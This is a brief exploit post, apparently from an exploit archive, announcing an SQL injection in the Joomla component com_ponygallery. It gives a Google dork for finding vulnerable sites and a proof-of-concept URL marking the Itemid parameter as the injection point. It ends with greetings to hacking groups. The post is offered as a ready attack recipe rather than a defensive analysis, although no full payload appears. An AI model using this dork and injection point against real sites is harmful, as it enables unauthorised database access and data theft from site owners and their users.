################################################## # Exploit Title: joomla component (com_ponygallery) SQL injection Vulnerability # Download : http://www.adyawinsa.com/index.php/remository?func=fileinfo&id=2 # Date: 11/04/2012 # Author: xDarkSton3x # E-mail : xdarkston3x@msn.com # Category: webapps # Google dork: inurl:"com_ponygallery" ################################################## [~]Exploit/p0c : http://www.site.com/index.php?option=com_ponygallery&Itemid=[sqli] Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng] - [ Malandrines Team - DiosdelaRed - RemoteExecution ] [ Dedalo - Maztor ]